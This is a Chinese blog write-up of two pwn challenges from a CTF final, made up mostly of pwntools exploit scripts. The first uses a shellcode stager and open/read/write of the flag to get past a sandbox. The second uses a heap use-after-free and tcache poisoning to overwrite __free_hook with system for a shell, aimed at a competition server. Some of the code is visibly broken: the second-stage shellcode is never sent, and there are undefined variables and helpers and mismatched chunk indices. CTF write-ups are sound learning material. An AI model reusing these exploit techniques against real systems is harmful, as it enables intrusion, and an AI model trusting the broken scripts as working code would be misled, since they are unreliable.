the_balt_and_road_final

文章发布时间:

最后更新时间:

抽象的赛制,业余的主办方
一带一路决赛题目附件
[pwn1]ez_pwn2
checksec



开了沙盒



程序会把输入的东西读到栈上并执行






比赛中把重点放到了溢出和直接写shellcode上,导致程序的跳转没拿捏住
三个小时里做了很多无用功,后面又去看了下堆题(pwn2)
没解出来
赛后出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
from pwn import *
from ctypes import *  

context.arch='amd64'
context.log_level = 'debug'

def debug():
    gdb.attach(p)
    pause()
#p = remote("110.110.110.113",49201)
main = 0x4009FC
pop_rbp_ret = 0x4008c0
pop_rdi_ret = 0x400b53
ret = 0x400288
leave_ret = 0x400999
p = process("./ez_pwn2")
elf = ELF("./ez_pwn2")

p.recvuntil(b'shh:')
stack_addr = int(p.recv(18),16)
success("stack: %s",hex(stack_addr))

# 构造一个read
shellcode1 = f'''
mov rsi,{stack_addr}
mov rdx,0x200
syscall
'''
payload1 = asm(shellcode1)
payload1 = payload1.ljust(0x28,b'A')
payload1 += p64(stack_addr)
p.sendline(payload1)

pause()
# ORW
shellcode2 = shellcraft.open('/flag')
shellcode2+= shellcraft.read(3,'rsp',0x40)
shellcode2 += shellcraft.write(1,'rsp',0x40)
payload2 = len(payload1) * b'\x90' + asm(shellcode1)
p.sendline(payload2)

p.interactive()

[pwn2]drunk
很常规的堆题
打的时候nt没找到那个backdoor
看来还得学一手修复

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
from pwn import*
p = remote('110.110.110.113',49211)
#p = process("./drunk2")
elf = ELF("./drunk2")
libc = ELF("./libc-2.31.so")
context(os='linux', arch='amd64', log_level='debug')

def debug():
    gdb.attach(p)
    pause()

def add(size,payload):
    p.recvuntil(b"-->>>> ")
    p.sendline(b'1')
    p.recvuntil(b"What size cup:")
    p.sendline(str(size))#0 <= malloc < 0x40
    p.recvuntil(b"Do you want something to add?")
    p.send(payload)

def delete(index):
    p.recvuntil("-->>>> ")
    p.sendline(b'2')
    p.recvuntil(b'cup number: ')
    p.sendline(str(index))#UAF

def edit(index,payload):
    p.recvuntil("-->>>> ")
    p.sendline(b'4')
    p.recvuntil(b"which cup:")
    p.sendline(str(index))
    p.recvuntil(b"refill")
    p.sendlineafter(b"Now add something",payload)

def show(index):
    p.recvuntil("-->>>> ")
    p.sendline(b'3')
    p.recvuntil(b"Let's see what you can do")
    p.sendline(str(index))


def bd():
    p.recvuntil('-->>>> \n')
    p.sendline('888')

bd()
add(0x38,'A') # 0
add(0x38,'B') # 1
delete(1)

delete(0)
show(0)
heap_base = u64(data.ljust(8,b'\x00'))(p.recv(6)) - 0x370

edit(0,p64(heap_base + 0x10))

pay = b'\x00' * 0x0e + b'\x07'

add(0x38,'exp1') # 2

add(0x38,pay) # 3


# exp 2

add(0x38,'A') # 4

add(0x38,'B') # 5

delete(4)

delete(5)
edit(5,p64(heap_base + 0x2a0))

add(0x38,'6') # 6
add(0x38,'7') # 7
delete(7)
show(7)
libc_base = uu64(r(6)) - 2018272
__free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
success('heap_base:%s',heap_base)
success('libc_base:%s',libc_base)
add(0x38,'/bin/sh\x00') # 8
add(0x38,'B') # 9
add(0x38,'/bin/sh\x00') # 8
add(0x38,'B') # 9
delete(10)
delete(11)
edit(11,p64(__free_hook))
add(0x38,'/bin/sh\x00') # 8
add(0x38,p64(system)) # 9

delete(7)
p.interactive()